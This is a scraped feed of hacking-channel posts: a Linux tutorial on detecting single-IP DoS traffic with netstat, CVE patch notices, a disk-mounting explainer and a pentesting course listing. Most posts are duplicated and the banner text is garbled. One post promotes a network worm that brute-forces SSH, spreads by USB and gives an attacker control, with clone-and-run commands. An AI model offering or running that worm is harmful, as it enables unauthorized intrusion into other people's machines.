β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ How to quickly check if your Linux server is under DoS attack from a single IP address ?
A) What do you need
The only thing you need to do this is a Linux server and a user with sudo privileges.
I will be demonstrating on Ubuntu Server 20.04.
We are going to use the netstat tool to find out what IPs are currently connected to your server.
To install netstat on Ubuntu, you actually install net-tools, for example:
> sudo apt-get install net-tools -y
If you are using CentOS or a Red Hat based installation, netstat should already be installed.
B) How to check your server load
The first thing we're going to do is check the load on our server.
The command we will use for this will return the number of logical processors (threads).
On the server, this number should be pretty low, but it depends on what you are running.
If you know everything is in order, make sure your number is off the charts and record the number.
If you suspect something is happening, run the flow check again and compare the results.
To check the number of logical processors, enter the command:
grep processor / proc / cpuinfo | wc -l
> If this number is significantly higher than your baseline, you may be in trouble.
For example, on my Pop! _OS I have 16 threads, but on a Nextcloud hosted Ubuntu server I only have two.
If any of these numbers doubled, I could be exposed to a DDoS attack.
C) How to check the load on your network
Next, we will check the load on our network.
It can be done with a number of tools, but I choose nload.
To install nload, enter the command:
sudo apt-get install nload -y
On CentOS, this command would be:
sudo dnf install nload -y
To run the tool, just enter the command:
nload
If this load is significantly higher than you think, you may be attacked.
How to find out which IP addresses are connected to your server
The next thing you need to do is find out which IPs are connected to your server.
For this we will use netstat like this:
netstat -ntu | awk '{print $ 5}' | cut -d: -f1 -s | sort | uniq -c | sort -nk1 -r
The output from the above command will list each IP address connected to the server and the number of instances of each.
Be sure to review this list carefully. If you see an IP address with a large number of instances (over 100), the chances of the address being the culprit for the load are pretty high.
Once you are sure of culpability, you can block the IP address with the command:
> sudo route add ADDRESS reject
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ How to quickly check if your Linux server is under DoS attack from a single IP address ?
A) What do you need
The only thing you need to do this is a Linux server and a user with sudo privileges.
I will be demonstrating on Ubuntu Server 20.04.
We are going to use the netstat tool to find out what IPs are currently connected to your server.
To install netstat on Ubuntu, you actually install net-tools, for example:
> sudo apt-get install net-tools -y
If you are using CentOS or a Red Hat based installation, netstat should already be installed.
B) How to check your server load
The first thing we're going to do is check the load on our server.
The command we will use for this will return the number of logical processors (threads).
On the server, this number should be pretty low, but it depends on what you are running.
If you know everything is in order, make sure your number is off the charts and record the number.
If you suspect something is happening, run the flow check again and compare the results.
To check the number of logical processors, enter the command:
grep processor / proc / cpuinfo | wc -l
> If this number is significantly higher than your baseline, you may be in trouble.
For example, on my Pop! _OS I have 16 threads, but on a Nextcloud hosted Ubuntu server I only have two.
If any of these numbers doubled, I could be exposed to a DDoS attack.
C) How to check the load on your network
Next, we will check the load on our network.
It can be done with a number of tools, but I choose nload.
To install nload, enter the command:
sudo apt-get install nload -y
On CentOS, this command would be:
sudo dnf install nload -y
To run the tool, just enter the command:
nload
If this load is significantly higher than you think, you may be attacked.
How to find out which IP addresses are connected to your server
The next thing you need to do is find out which IPs are connected to your server.
For this we will use netstat like this:
netstat -ntu | awk '{print $ 5}' | cut -d: -f1 -s | sort | uniq -c | sort -nk1 -r
The output from the above command will list each IP address connected to the server and the number of instances of each.
Be sure to review this list carefully. If you see an IP address with a large number of instances (over 100), the chances of the address being the culprit for the load are pretty high.
Once you are sure of culpability, you can block the IP address with the command:
> sudo route add ADDRESS reject
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from DailyCVE
π΅Patch for Dell Wyse ThinOS authorization issue vulnerability:
https://dailycve.com/patch-dell-wyse-thinos-authorization-issue-vulnerability
https://dailycve.com/patch-dell-wyse-thinos-authorization-issue-vulnerability
Dailycve
Patch for Dell Wyse ThinOS authorization issue vulnerability | CVE
Details:
Dell Wyse ThinOS is a dedicated Dell Cloud Operating System from Dell (Dell). ThinOS 8.6 and previous versions of Dell Wyse have security bugs, and this flaw can be exploited by attackers to access writable files and exploit the configurationβ¦
Forwarded from DailyCVE
π΅Fix for the weakness of Adobe Photoshop heap buffer overflow:
https://dailycve.com/fix-weakness-adobe-photoshop-heap-buffer-overflow
https://dailycve.com/fix-weakness-adobe-photoshop-heap-buffer-overflow
Dailycve
Fix for the weakness of Adobe Photoshop heap buffer overflow | CVE
Details:
Adobe Photoshop, known as 'PS', is a platform for image editing developed and distributed by Adobe. Adobe Photoshop 22.1 and older releases provide the vulnerability of heap buffer overload. Attackers can run arbitrary code using this vulnerability.β¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE TESTING
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python network worm that spreads on the local network and gives the attacker control of these machines:
You can bruteforce ssh servers, spread with USBs, etc..
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/pylyf/NetWorm.git
2) cd NetWorm
3) python worm.py
You can bruteforce ssh servers, spread with USBs, etc..
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python network worm that spreads on the local network and gives the attacker control of these machines:
You can bruteforce ssh servers, spread with USBs, etc..
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/pylyf/NetWorm.git
2) cd NetWorm
3) python worm.py
You can bruteforce ssh servers, spread with USBs, etc..
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - pylyf/NetWorm: Python network worm that spreads on the local network and gives the attacker control of these machines.
Python network worm that spreads on the local network and gives the attacker control of these machines. - pylyf/NetWorm
Forwarded from DailyCVE
π΅Microsoft Windows Multipoint security vulnerability:
https://dailycve.com/microsoft-windows-multipoint-security-vulnerability
https://dailycve.com/microsoft-windows-multipoint-security-vulnerability
Dailycve
Microsoft Windows Multipoint security vulnerability | CVE
Details:
Microsoft Windows is an operating system that uses a collection of Microsoft Corporation personal computers. Windows Elevation in Privilege Risk Multipoint Control. No information on this weakness remains. At any moment, please follow CNNVDβ¦
Forwarded from DailyCVE
π΅Microsoft Walletservice access control error vulnerability:
https://dailycve.com/microsoft-walletservice-access-control-error-vulnerability
https://dailycve.com/microsoft-walletservice-access-control-error-vulnerability
Dailycve
Microsoft Walletservice access control error vulnerability | CVE
Details:
Microsoft Walletservice is an application used by Microsoft for payment purposes. A susceptibility to privilege escalation occurs in Microsoft Walletservice. No information on this weakness remains.
Forwarded from UNDERCODE NEWS
GPS data reveals that some consumers of Parler engaged in protests at the American Chamber of Commerce.
#International
#International
Forwarded from UNDERCODE NEWS
Behind the scenes, performance blinds, customers and security warning for windows 10.
#Vulnerabilities
#Vulnerabilities
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How mount operation relates to partitioning and formatting
Mounting is one of the types of actions that you can perform on a disk (block device). Referring to the device by its name / dev / * it is possible:
1) create new sections
2) delete existing partitions
3) format partitions or entire disk
perform low-level settings at the device level (setting the read only flag at the disk level, reset the write cache on the disk, control Advanced Power Management, etc.), as well as read the values ββof these settings and disk properties
clone the contents of a disk using the dd command (or analogs) to a file or to another disk
4) restore the contents of a disk from a file with the dd command
5) mount disk partitions (or the entire disk if not partitioned)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How mount operation relates to partitioning and formatting
Mounting is one of the types of actions that you can perform on a disk (block device). Referring to the device by its name / dev / * it is possible:
1) create new sections
2) delete existing partitions
3) format partitions or entire disk
perform low-level settings at the device level (setting the read only flag at the disk level, reset the write cache on the disk, control Advanced Power Management, etc.), as well as read the values ββof these settings and disk properties
clone the contents of a disk using the dd command (or analogs) to a file or to another disk
4) restore the contents of a disk from a file with the dd command
5) mount disk partitions (or the entire disk if not partitioned)
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
The first routine patch of the year, 83 in all, including zero-day and pre-disclosed exploits.
#CyberAttacks #Analytiques
#CyberAttacks #Analytiques
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from DailyCVE
π΅Siemens Jt2go and Siemens Teamcenter Visualization authorization issue vulnerability:
https://dailycve.com/siemens-jt2go-and-siemens-teamcenter-visualization-authorization-issue-vulnerability
https://dailycve.com/siemens-jt2go-and-siemens-teamcenter-visualization-authorization-issue-vulnerability
Dailycve
Siemens Jt2go and Siemens Teamcenter Visualization authorization issue vulnerability | CVE
Details:
The products of the German company Siemens are both Siemens Jt2go and Siemens Teamcenter Visualization. Siemens Jt2go is a viewer for JT files. The app is used for 3D graphics lightweight preview, which can handle 3D zoom, panoramic, rotate,β¦
Forwarded from DailyCVE
π΅Siemens Solid Edge input validation error vulnerability:
https://dailycve.com/siemens-solid-edge-input-validation-error-vulnerability
https://dailycve.com/siemens-solid-edge-input-validation-error-vulnerability
Dailycve
Siemens Solid Edge input validation error vulnerability | CVE
Details:
Siemens Solid Edge is a 3D CAD application developed by Siemens in Germany. The software can be used in the design of components, assembly design, design of sheet metal, design of welding and other industries. There is a weakness previous toβ¦
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦4.5 rating free Foundations of Hacking and Pentesting Android Apps:
Setting up Android Studio and Emulators
Basics of adb
Decompiling apks
Insecure Logging
Hardcoding Issues
Insecure Data Storage
Input Valdiation Issues
Drozer
Finding Attack Surfaces
Access Control Issues
Content Provider Injections
General Bug Hunting Tips
https://www.udemy.com/course/foundations-of-hacking-and-pentesting-android-apps/
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦4.5 rating free Foundations of Hacking and Pentesting Android Apps:
Setting up Android Studio and Emulators
Basics of adb
Decompiling apks
Insecure Logging
Hardcoding Issues
Insecure Data Storage
Input Valdiation Issues
Drozer
Finding Attack Surfaces
Access Control Issues
Content Provider Injections
General Bug Hunting Tips
https://www.udemy.com/course/foundations-of-hacking-and-pentesting-android-apps/
β β β Uππ»βΊπ«Δπ¬πβ β β β
Udemy
Free Ethical Hacking Tutorial - Foundations of Hacking and Pentesting Android Apps
Learn how to hack Android apps, and find vulnerabilties - Free Course
Join UNDERCODEβs Server on Discord π: https://discord.gg/JMPHbGJG